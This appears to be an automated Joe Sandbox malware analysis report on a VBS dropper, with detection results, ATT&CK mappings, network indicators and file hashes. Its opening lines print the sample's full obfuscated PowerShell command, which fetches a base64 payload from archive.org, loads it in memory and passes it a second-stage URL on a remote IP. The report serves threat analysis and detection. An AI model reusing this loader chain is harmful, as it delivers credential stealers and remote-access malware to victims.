              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "& ( $env:comspec[4,24,25]-join'') (('79'+'durl ='+' kqjht'+'tps'+'://ia600100.'+'us.'+'archive.org/'+'24/items/de'+'tah-note-v/de'+'tahn'+'ote'+'v.txtkqj'+';7'+'9dbase64conten'+'t '+'='+' (new-object system.net.w'+'eb'+'clie'+'nt).downloa'+'dstring(79du'+'rl);7'+'9dbina'+'ry'+'cont'+'ent ='+' '+'[sy'+'stem.co'+'n'+'vert'+']::'+'frombase'+'6'+'4string('+'7'+'9dbase64content);7'+'9d'+'assemb'+'ly = [r'+'ef'+'l'+'ecti'+'on.a'+'s'+'sembly]::load(79dbinar'+'yco'+'ntent)'+';'+'79'+'dtype ='+' 79d'+'assembl'+'y.gett'+'ype(k'+'qj'+'r'+'unpe'+'.home'+'kqj);'+'79dm'+'ethod = '+'79dty'+'p'+'e.g'+'etmetho'+'d('+'kq'+'j'+'vaikq'+'j);79dmethod.invo'+'ke(79d'+'nu'+'ll,'+' [objec'+'t[]]'+'@(kqj'+'tx'+'t.htomr/031/842.841.271.701//'+':ptthk'+'qj , kqj'+'de'+'sativ'+'adokqj , kqjdesativad'+'okqj'+' , kqjde'+'sativadokqj,kqjrega'+'smkqj'+','+'k'+'qjkq'+'j'+'))').replace(([char]55+[char]57+[char]100),'$').replace(([char]75+[char]113+[char]106),[string][char]39) )"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

Source: Yara match | File source: 4.2.powershell.exe.1c4663f0ed8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.powershell.exe.1c4663f0ed8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.powershell.exe.1c46ddf0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.powershell.exe.1c46ddf0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.1853253841.000001C46DDF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1834352585.000001C465BDC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

Source: Yara match | File source: 4.2.powershell.exe.1c4663f0ed8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.powershell.exe.1c4663f0ed8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.powershell.exe.1c46ddf0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.powershell.exe.1c46ddf0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.1853253841.000001C46DDF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1834352585.000001C465BDC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information221
              Scripting
              Valid Accounts11
              Command and Scripting Interpreter
              221
              Scripting
              11
              Process Injection
              1
              Masquerading
              OS Credential Dumping1
              Security Software Discovery
              Remote ServicesData from Local System1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Exploitation for Client Execution
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              21
              Virtualization/Sandbox Evasion
              LSASS Memory1
              Process Discovery
              Remote Desktop ProtocolData from Removable Media1
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts3
              PowerShell
              Logon Script (Windows)Logon Script (Windows)11
              Process Injection
              Security Account Manager21
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Deobfuscate/Decode Files or Information
              NTDS1
              Application Window Discovery
              Distributed Component Object ModelInput Capture3
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
              Obfuscated Files or Information
              LSA Secrets1
              File and Directory Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Software Packing
              Cached Domain Credentials12
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Source | Detection | Scanner | Label
0BO4n723Q8.vbs | 8% | ReversingLabs | Win32.Trojan.Generic
0BO4n723Q8.vbs | 10% | Virustotal
              No Antivirus matches
              No Antivirus matches
Source | Detection | Scanner
ia600100.us.archive.org | 0% | Virustotal
Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://oneget.orgX | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://oneget.org | 0% | URL Reputation | safe
https://ia600100.us.archive.org | 1% | Virustotal
http://www.apache.org/licenses/LICENSE-2.0 | 0% | Virustotal
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt | 10% | Virustotal
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Virustotal
http://107.172.148.248/130/RMOTH.txt | 20% | Virustotal
http://107.172.148.248 | 11% | Virustotal
http://ia600100.us.archive.org | 0% | Virustotal
https://github.com/Pester/Pester | 1% | Virustotal
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ia600100.us.archive.org | 207.241.227.240 | true | false | | unknown
241.42.69.40.in-addr.arpa | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt | false | | unknown
http://107.172.148.248/130/RMOTH.txt | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000004.00000002.1819764477.000001C456F80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1834352585.000001C465633000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000004.00000002.1819764477.000001C456CF4000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000004.00000002.1819764477.000001C456F25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819764477.000001C456CF4000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ia600100.us.arXr | powershell.exe, 00000004.00000002.1819764477.000001C456735000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000004.00000002.1819764477.000001C456F25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819764477.000001C456CF4000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://go.micro | powershell.exe, 00000004.00000002.1819764477.000001C456735000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000004.00000002.1834352585.000001C465633000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000004.00000002.1819764477.000001C456F80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1834352585.000001C465633000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000004.00000002.1834352585.000001C465633000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000004.00000002.1834352585.000001C465633000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://oneget.orgX | powershell.exe, 00000004.00000002.1819764477.000001C456CF4000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ia600100.us.archive.org | powershell.exe, 00000004.00000002.1819764477.000001C4557E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819764477.000001C456735000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.1863528716.000001F48D33A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1863528716.000001F48D31B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819764477.000001C4555C1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.microsoft.c | powershell.exe, 00000004.00000002.1853033639.000001C46DAEB000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://107.172.148.248( | powershell.exe, 00000004.00000002.1819764477.000001C455BCB000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.1863528716.000001F48D367000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819764477.000001C4555C1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://107.172.148.248 | powershell.exe, 00000004.00000002.1819764477.000001C455A12000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://github.com/Pester/Pester | powershell.exe, 00000004.00000002.1819764477.000001C456F25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819764477.000001C456CF4000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtKqj;79dbase64Content | powershell.exe, 00000004.00000002.1819764477.000001C4557E2000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://oneget.org | powershell.exe, 00000004.00000002.1819764477.000001C456CF4000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ia600100.us.archive.org | powershell.exe, 00000004.00000002.1819764477.000001C456CAC000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://www.System.resources%20Time-Stamp%20PCA%202010(1).crl0l | powershell.exe, 00000004.00000002.1852407179.000001C46DA61000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
107.172.148.248 | unknown | United States | 36352 | AS-COLOCROSSINGUS | false
207.241.227.240 | ia600100.us.archive.org | United States | 7941 | INTERNET-ARCHIVEUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1523824
Start date and time: 2024-10-02 05:22:13 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 26s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 0BO4n723Q8.vbs
renamed because original name is a hash value
Original Sample Name: 35d62ef87119b12931f40ed80b1cf35e8b32097027f77f96d27351fbf9d4501b.vbs
Detection: MAL
Classification: mal100.troj.expl.evad.winVBS@6/6@2/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 88%
• Number of executed functions: 10
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .vbs
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 7584 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7744 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
23:23:16 | API Interceptor | 18090x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
107.172.148.248 | gwfe4fo1Sp.rtf | malicious | Remcos, PureLog Stealer | 107.172.148.248/130/RMOTH.txt
107.172.148.248 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.22755.22546.rtf | malicious | Remcos, PureLog Stealer | 107.172.148.248/82/awss.txt
107.172.148.248 | SecuriteInfo.com.Trojan-Downloader.Office.Doc.20731.18439.xlsx | malicious | Remcos, PureLog Stealer | 107.172.148.248/82/awss.txt
207.241.227.240 | PofaABvatI.vbs | malicious | AgentTesla, PureLog Stealer
207.241.227.240 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtf | malicious | PureLog Stealer
207.241.227.240 | RFQ 2024.09.26-89 vivecta.vbs | malicious | PureLog Stealer
207.241.227.240 | AGMETIGA zapytanie ofertowe.xls | malicious | PureLog Stealer
207.241.227.240 | sostener.vbs | malicious | Remcos, PureLog Stealer
207.241.227.240 | asegurar.vbs | malicious | Remcos, PureLog Stealer
207.241.227.240 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf | malicious | Remcos, PureLog Stealer
207.241.227.240 | LJ1IZDkHyE.hta | malicious | Cobalt Strike, Remcos, PureLog Stealer
207.241.227.240 | hnvc.vbs | malicious | PureLog Stealer
207.241.227.240 | wm.vbs | malicious | PureLog Stealer, XWorm
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ia600100.us.archive.org | PofaABvatI.vbs | malicious | AgentTesla, PureLog Stealer | 207.241.227.240
ia600100.us.archive.org | SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtf | malicious | PureLog Stealer | 207.241.227.240
ia600100.us.archive.org | RFQ 2024.09.26-89 vivecta.vbs | malicious | PureLog Stealer | 207.241.227.240
ia600100.us.archive.org | AGMETIGA zapytanie ofertowe.xls | malicious | PureLog Stealer | 207.241.227.240
ia600100.us.archive.org | sostener.vbs | malicious | Remcos, PureLog Stealer | 207.241.227.240
ia600100.us.archive.org | asegurar.vbs | malicious | Remcos, PureLog Stealer | 207.241.227.240
ia600100.us.archive.org | SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf | malicious | Remcos, PureLog Stealer | 207.241.227.240
ia600100.us.archive.org | LJ1IZDkHyE.hta | malicious | Cobalt Strike, Remcos, PureLog Stealer | 207.241.227.240
ia600100.us.archive.org | hnvc.vbs | malicious | PureLog Stealer | 207.241.227.240
ia600100.us.archive.org | wm.vbs | malicious | PureLog Stealer, XWorm | 207.241.227.240
Match | Associated Sample Name / URL | Detection | Threat Name | Context
INTERNET-ARCHIVEUS | PofaABvatI.vbs | malicious | AgentTesla, PureLog Stealer | 207.241.227.240
INTERNET-ARCHIVEUS | SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtf | malicious | PureLog Stealer | 207.241.227.240
INTERNET-ARCHIVEUS | SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtf | malicious | Remcos | 207.241.227.96
INTERNET-ARCHIVEUS | RFQ 2024.09.26-89 vivecta.vbs | malicious | PureLog Stealer | 207.241.227.240
INTERNET-ARCHIVEUS | AGMETIGA zapytanie ofertowe.xls | malicious | PureLog Stealer | 207.241.227.240
INTERNET-ARCHIVEUS | REQUEST FOR QUOTATION.js | malicious | PXRECVOWEIWOEI Stealer, PureLog Stealer | 207.241.235.61
INTERNET-ARCHIVEUS | sostener.vbs | malicious | Remcos, PureLog Stealer | 207.241.227.240
INTERNET-ARCHIVEUS | asegurar.vbs | malicious | Remcos, PureLog Stealer | 207.241.227.240
INTERNET-ARCHIVEUS | SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf | malicious | Remcos, PureLog Stealer | 207.241.227.240
INTERNET-ARCHIVEUS | http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | malicious | Unknown | 207.241.237.3
AS-COLOCROSSINGUS | CEjWMdiJnR.exe | malicious | DanaBot | 23.95.182.47
AS-COLOCROSSINGUS | 8CRB0iJuy1.dll | malicious | DanaBot | 23.95.182.47
AS-COLOCROSSINGUS | CEjWMdiJnR.exe | malicious | DanaBot | 23.95.182.47
AS-COLOCROSSINGUS | 8CRB0iJuy1.dll | malicious | DanaBot | 23.95.182.47
AS-COLOCROSSINGUS | CANADAXORDER.xls | malicious | Snake Keylogger | 172.245.123.6
AS-COLOCROSSINGUS | Shipping Documents.xls | malicious | Remcos | 104.168.32.148
AS-COLOCROSSINGUS | SecuriteInfo.com.Exploit.CVE-2017-11882.123.28227.30541.rtf | malicious | Remcos | 104.168.7.8
AS-COLOCROSSINGUS | Scan Order and Specification 01-10- 2024.docx | malicious | Remcos | 104.168.7.8
AS-COLOCROSSINGUS | ORDER-24930-067548.js | malicious | StormKitty, XWorm | 192.210.215.11
AS-COLOCROSSINGUS | AE1169-0106202.xls | malicious | Snake Keylogger | 172.245.123.9
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | PofaABvatI.vbs | malicious | AgentTesla, PureLog Stealer | 207.241.227.240
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | Credential Flusher | 207.241.227.240
3b5074b1b5d032e5620f69f9f700ff0e | mitec_purchase_order_PDF (1).vbs | malicious | PXRECVOWEIWOEI Stealer | 207.241.227.240
3b5074b1b5d032e5620f69f9f700ff0e | DHL Shipping documents 0020398484995500.exe | malicious | AgentTesla | 207.241.227.240
3b5074b1b5d032e5620f69f9f700ff0e | http://tvsurf.jp/ | malicious | Unknown | 207.241.227.240
3b5074b1b5d032e5620f69f9f700ff0e | https://files.constantcontact.com/2d77228b901/702368a5-3f96-4cb6-b61d-aab8728be1ff.pdf | malicious | Unknown | 207.241.227.240
3b5074b1b5d032e5620f69f9f700ff0e | https://sanbernardinoscounty.telcom-info.com/ | malicious | HtmlDropper | 207.241.227.240
3b5074b1b5d032e5620f69f9f700ff0e | OXrZ6fj4Hq.exe | malicious | Neshta, Oski Stealer, StormKitty, SugarDump, Vidar, XWorm | 207.241.227.240
3b5074b1b5d032e5620f69f9f700ff0e | Pedido09669281099195.com.exe | malicious | DarkTortilla, Quasar | 207.241.227.240
3b5074b1b5d032e5620f69f9f700ff0e | https://finalstepgetshere.com/uploads/beta9.zip | malicious | LummaC | 207.241.227.240
                                              No context
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 9434
Entropy (8bit): 4.928515784730612
Encrypted: false
SSDEEP: 192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
MD5: D3594118838EF8580975DDA877E44DEB
SHA1: 0ACABEA9B50CA74E6EBAE326251253BAF2E53371
SHA-256: 456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
SHA-512: 103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
Malicious: false
Reputation: moderate, very likely benign file
Preview: PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1940658735648508
Encrypted: false
SSDEEP: 3:Nlllulf66llp:NllUSOl
MD5: B798C92691636A7830BE142C313C0E72
SHA1: 53C2A97D145573705355A8C39757DB8009D116CC
SHA-256: 5D6C0E321D148D9CD398B4261686BA6344F9FFF6FB4226AF1C8AEE4FB89DC75F
SHA-512: 6198106131F8C8083DA7946BADE71A6BB3A37474DC81E699976680CD3ACC1E84B8A151F7F8D15A79C1343BB108992D44CB98FE78593F55CE891B669EB6022106
Malicious: false
Reputation: moderate, very likely benign file
Preview: @...e................................................@..........
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Entropy (8bit):3.7705724362604034
                                              TrID:
                                              • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                              • MP3 audio (1001/1) 32.22%
                                              • Lumena CEL bitmap (63/63) 2.03%
                                              • Corel Photo Paint (41/41) 1.32%
                                              File name:0BO4n723Q8.vbs
                                              File size:279'362 bytes
                                              MD5:19f9fc1579433299ad398e80b01f4137
                                              SHA1:f1ebb5f2428d32d75b5c76da93ae9f776f95303a
                                              SHA256:35d62ef87119b12931f40ed80b1cf35e8b32097027f77f96d27351fbf9d4501b
                                              SHA512:4b25c61505670cf3bea0e5275065b7efed14238ba143b8349724a935122b6e879db00ff49cb6b015fc8fd59f94771186fff22f0dc0c577787c602377b60d1ab1
                                              SSDEEP:6144:wUzkLcYZTn63w8in1dYaeDYl/Nwp8812Vja+d+N3uofQvvQ:wUoLcYZTn63w8invYbDAwj2g+4NeofQg
                                              TLSH:D554060225EA7108F1F32F6696F955F94F67B9662A39811D648C0B0F1BE3E80CD51BB3
